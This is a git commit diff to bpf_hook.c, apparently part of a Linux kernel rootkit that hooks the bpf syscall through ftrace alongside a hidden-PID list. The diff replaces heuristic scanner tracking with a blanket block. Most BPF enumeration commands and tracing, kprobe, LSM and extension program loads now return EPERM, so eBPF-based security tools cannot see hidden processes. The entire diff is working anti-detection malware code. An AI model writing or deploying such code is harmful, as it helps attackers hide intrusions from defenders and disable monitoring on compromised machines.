Update bpf_hook.c

MatheuZSecurity · web-flow · commit a9a02d4ee2c1 · 2025-10-15T16:45:41.000-03:00
diff --git a/modules/bpf_hook.c b/modules/bpf_hook.c
@@ -1,33 +1,42 @@
 /*
-Initial testing version
+Minimal experimental version / test 2
 */
 
 #include "../include/core.h"
 #include "../ftrace/ftrace_helper.h"
 #include "../include/hidden_pids.h"
 #include "../include/bpf_hook.h"
 
-#define BPF_PROG_LOAD       5
-#define BPF_OBJ_PIN         6
-#define BPF_ITER_CREATE     21
-#define BPF_LINK_CREATE     28
-
-#define BPF_PROG_TYPE_TRACING 26
-
-#define MAX_TRACKED 64
-#define SCAN_WINDOW_JIFFIES (HZ * 30)
-
-struct scanner_behavior {
-    pid_t pid;
-    unsigned long first_seen;
-    unsigned long last_call;
-    unsigned int bpf_prog_loads;
-    unsigned int bpf_iter_attempts;
-    bool marked_suspicious;
-};
-
-static struct scanner_behavior scanners[MAX_TRACKED];
-static DEFINE_SPINLOCK(scanner_lock);
+#define BPF_MAP_CREATE          0
+#define BPF_MAP_LOOKUP_ELEM     1
+#define BPF_MAP_UPDATE_ELEM     2
+#define BPF_PROG_LOAD           5
+#define BPF_OBJ_PIN             6
+#define BPF_OBJ_GET             7
+#define BPF_PROG_ATTACH         8
+#define BPF_PROG_DETACH         9
+#define BPF_PROG_TEST_RUN       10
+#define BPF_PROG_GET_NEXT_ID    11
+#define BPF_MAP_GET_NEXT_ID     12
+#define BPF_PROG_GET_FD_BY_ID   13
+#define BPF_MAP_GET_FD_BY_ID    14
+#define BPF_OBJ_GET_INFO_BY_FD  15
+#define BPF_PROG_QUERY          16
+#define BPF_RAW_TRACEPOINT_OPEN 17
+#define BPF_BTF_LOAD            18
+#define BPF_BTF_GET_FD_BY_ID    19
+#define BPF_TASK_FD_QUERY       20
+#define BPF_ITER_CREATE         21
+#define BPF_LINK_CREATE         28
+#define BPF_LINK_UPDATE         29
+#define BPF_LINK_GET_FD_BY_ID   30
+#define BPF_LINK_GET_NEXT_ID    31
+
+#define BPF_PROG_TYPE_TRACEPOINT    5
+#define BPF_PROG_TYPE_KPROBE         6
+#define BPF_PROG_TYPE_TRACING       26
+#define BPF_PROG_TYPE_LSM           28
+#define BPF_PROG_TYPE_EXT           29
 
 static asmlinkage long (*orig_bpf)(const struct pt_regs *);
 static asmlinkage long (*orig_bpf_ia32)(const struct pt_regs *);
@@ -48,79 +57,10 @@ notrace static inline bool should_hide_pid_by_int(int pid)
     return false;
 }
 
-notrace static int get_or_create_scanner_idx_locked(pid_t pid, unsigned long now)
-{
-    int i, empty = -1;
-
-    for (i = 0; i < MAX_TRACKED; i++) {
-        if (scanners[i].pid != 0 &&
-            time_after(now, scanners[i].last_call + SCAN_WINDOW_JIFFIES)) {
-            memset(&scanners[i], 0, sizeof(scanners[i]));
-        }
-
-        if (scanners[i].pid == pid) {
-            scanners[i].last_call = now;
-            return i;
-        }
-        if (scanners[i].pid == 0 && empty == -1)
-            empty = i;
-    }
-
-    if (empty >= 0) {
-        scanners[empty].pid = pid;
-        scanners[empty].first_seen = now;
-        scanners[empty].last_call = now;
-        scanners[empty].bpf_prog_loads = 0;
-        scanners[empty].bpf_iter_attempts = 0;
-        scanners[empty].marked_suspicious = false;
-        return empty;
-    }
-
-    return -1;
-}
-
-notrace static inline bool is_word_char(char c)
-{
-    return (c >= 'a' && c <= 'z') ||
-           (c >= '0' && c <= '9') ||
-           (c == '_');
-}
-
-notrace static bool contains_word(const char *name, size_t name_len,
-                          const char *word, size_t word_len)
-{
-    size_t i;
-
-    if (!name || !word || word_len == 0 || name_len == 0)
-        return false;
-
-    if (word_len > name_len)
-        return false;
-
-    for (i = 0; i + word_len <= name_len; i++) {
-        size_t j;
-        for (j = 0; j < word_len; j++) {
-            if (name[i + j] != word[j])
-                break;
-        }
-        if (j != word_len)
-            continue;
-
-        bool start_ok = (i == 0) || !is_word_char(name[i - 1]);
-        bool end_ok = (i + word_len >= name_len) || !is_word_char(name[i + word_len]);
-
-        if (start_ok && end_ok)
-            return true;
-    }
-    return false;
-}
-
-notrace static bool is_task_iterator_load(union bpf_attr __user *uattr, unsigned int size)
+notrace static bool is_dangerous_prog_type(union bpf_attr __user *uattr, unsigned int size)
 {
     union bpf_attr kattr;
-    char name[BPF_OBJ_NAME_LEN];
     size_t copy_size;
-    int i;
 
     if (!uattr || size == 0)
         return false;
@@ -129,133 +69,66 @@ notrace static bool is_task_iterator_load(union bpf_attr __user *uattr, unsigned
     memset(&kattr, 0, sizeof(kattr));
 
     if (copy_from_user(&kattr, uattr, copy_size))
-        return false;
-
-    if (kattr.prog_type == BPF_PROG_TYPE_TRACING)
         return true;
 
-    memset(name, 0, sizeof(name));
-    for (i = 0; i < BPF_OBJ_NAME_LEN - 1 && kattr.prog_name[i]; i++) {
-        char c = kattr.prog_name[i];
-        if (c >= 'A' && c <= 'Z')
-            c = c + ('a' - 'A');
-        name[i] = c;
-    }
-
-    const char *words[] = { "task", "sched", "proc", "iter", "pid", "enum" };
-    const size_t nwords = ARRAY_SIZE(words);
-    size_t name_len = strnlen(name, BPF_OBJ_NAME_LEN);
-
-    if (name_len == 0)
-        return false;
-
-    for (i = 0; i < nwords; i++) {
-        const char *w = words[i];
-        size_t wlen = strlen(w);
-        if (contains_word(name, name_len, w, wlen))
+    switch (kattr.prog_type) {
+        case BPF_PROG_TYPE_TRACEPOINT:
+        case BPF_PROG_TYPE_KPROBE:
+        case BPF_PROG_TYPE_TRACING:
+        case BPF_PROG_TYPE_LSM:
+        case BPF_PROG_TYPE_EXT:
             return true;
+        default:
+            return false;
     }
-
-    return false;
-}
-
-notrace static bool check_proc_enumeration_pattern(void)
-{
-    struct files_struct *files;
-    struct fdtable *fdt;
-    struct file *file;
-    int i, proc_fds = 0;
-
-    rcu_read_lock();
-    files = rcu_dereference(current->files);
-    if (!files) {
-        rcu_read_unlock();
-        return false;
-    }
-
-    fdt = files_fdtable(files);
-    if (!fdt) {
-        rcu_read_unlock();
-        return false;
-    }
-
-    for (i = 0; i < min(fdt->max_fds, 64); i++) {
-        file = rcu_dereference(fdt->fd[i]);
-        if (!file || !file->f_path.dentry)
-            continue;
-
-        const char *name = file->f_path.dentry->d_name.name;
-        if (!name)
-            continue;
-
-        if (strnlen(name, 64) < 64 &&
-            (strcmp(name, "proc") == 0 || strcmp(name, "bpf") == 0))
-            proc_fds++;
-    }
-
-    rcu_read_unlock();
-    return (proc_fds >= 2);
 }
 
-notrace static bool analyze_and_should_block(int cmd, union bpf_attr __user *uattr, unsigned int size)
+notrace static bool should_block_bpf_cmd(int cmd, union bpf_attr __user *uattr, unsigned int size)
 {
-    unsigned long flags;
     pid_t pid = current->tgid;
-    bool block = false;
-    int idx = -1;
-    unsigned long now = jiffies;
 
-    if (pid <= 1 || should_hide_pid_by_int(pid))
+    if (pid <= 1)
         return false;
 
-    spin_lock_irqsave(&scanner_lock, flags);
-    idx = get_or_create_scanner_idx_locked(pid, now);
-    if (idx < 0) {
-        spin_unlock_irqrestore(&scanner_lock, flags);
-        return false;
-    }
+    if (should_hide_pid_by_int(pid))
+        return true;
 
     switch (cmd) {
         case BPF_PROG_LOAD:
-            scanners[idx].bpf_prog_loads++;
-            if (is_task_iterator_load(uattr, size)) {
-                scanners[idx].marked_suspicious = true;
-                block = true;
-            }
-            break;
+            return is_dangerous_prog_type(uattr, size);
 
         case BPF_ITER_CREATE:
+        case BPF_PROG_GET_NEXT_ID:
+        case BPF_MAP_GET_NEXT_ID:
+        case BPF_LINK_GET_NEXT_ID:
+        case BPF_TASK_FD_QUERY:
+            return true;
+
+        case BPF_RAW_TRACEPOINT_OPEN:
         case BPF_LINK_CREATE:
-            scanners[idx].bpf_iter_attempts++;
-            scanners[idx].marked_suspicious = true;
-            block = true;
-            break;
+        case BPF_LINK_UPDATE:
+            return true;
 
+        case BPF_PROG_QUERY:
+        case BPF_OBJ_GET_INFO_BY_FD:
+            return true;
+
+        case BPF_PROG_GET_FD_BY_ID:
+        case BPF_MAP_GET_FD_BY_ID:
+        case BPF_BTF_GET_FD_BY_ID:
+        case BPF_LINK_GET_FD_BY_ID:
+            return true;
+
+        case BPF_MAP_CREATE:
+        case BPF_MAP_LOOKUP_ELEM:
+        case BPF_MAP_UPDATE_ELEM:
         case BPF_OBJ_PIN:
-            if (scanners[idx].marked_suspicious)
-                block = true;
-            break;
-    }
+        case BPF_OBJ_GET:
+            return false;
 
-    if (scanners[idx].bpf_prog_loads >= 5 || scanners[idx].bpf_iter_attempts >= 3)
-        scanners[idx].marked_suspicious = true;
-
-    bool was_marked = scanners[idx].marked_suspicious;
-    spin_unlock_irqrestore(&scanner_lock, flags);
-
-    if (!block && check_proc_enumeration_pattern()) {
-        spin_lock_irqsave(&scanner_lock, flags);
-        if (idx >= 0 && scanners[idx].pid == pid) {
-            scanners[idx].marked_suspicious = true;
-            block = true;
-        }
-        spin_unlock_irqrestore(&scanner_lock, flags);
-    } else {
-        if (!block && was_marked && cmd == BPF_OBJ_PIN)
-            block = true;
+        default:
+            return true;
     }
-
-    return block;
 }
 
 notrace static asmlinkage long hook_bpf(const struct pt_regs *regs)
@@ -271,12 +144,11 @@ notrace static asmlinkage long hook_bpf(const struct pt_regs *regs)
     uattr = (union bpf_attr __user *)regs->si;
     size = (unsigned int)regs->dx;
 
-    if ((cmd == BPF_PROG_LOAD || cmd == BPF_ITER_CREATE ||
-         cmd == BPF_LINK_CREATE || cmd == BPF_OBJ_PIN) &&
-        size > 0 && size <= sizeof(union bpf_attr)) {
+    if (size > sizeof(union bpf_attr))
+        return -EINVAL;
 
-        if (analyze_and_should_block(cmd, uattr, size))
-            return -EPERM;
+    if (should_block_bpf_cmd(cmd, uattr, size)) {
+        return -EPERM;
     }
 
     return orig_bpf(regs);
@@ -295,12 +167,11 @@ notrace static asmlinkage long hook_bpf_ia32(const struct pt_regs *regs)
     uattr = (union bpf_attr __user *)regs->cx;
     size = (unsigned int)regs->dx;
 
-    if ((cmd == BPF_PROG_LOAD || cmd == BPF_ITER_CREATE ||
-         cmd == BPF_LINK_CREATE || cmd == BPF_OBJ_PIN) &&
-        size > 0 && size <= sizeof(union bpf_attr)) {
+    if (size > sizeof(union bpf_attr))
+        return -EINVAL;
 
-        if (analyze_and_should_block(cmd, uattr, size))
-            return -EPERM;
+    if (should_block_bpf_cmd(cmd, uattr, size)) {
+        return -EPERM;
     }
 
     return orig_bpf_ia32(regs);
@@ -313,17 +184,14 @@ static struct ftrace_hook hooks[] = {
 
 notrace int bpf_hook_init(void)
 {
-    memset(scanners, 0, sizeof(scanners));
-
     int ret = fh_install_hooks(hooks, ARRAY_SIZE(hooks));
     if (ret != 0)
-        return 0;
+        return ret;
 
     return 0;
 }
 
 notrace void bpf_hook_exit(void)
 {
     fh_remove_hooks(hooks, ARRAY_SIZE(hooks));
-    memset(scanners, 0, sizeof(scanners));
 }
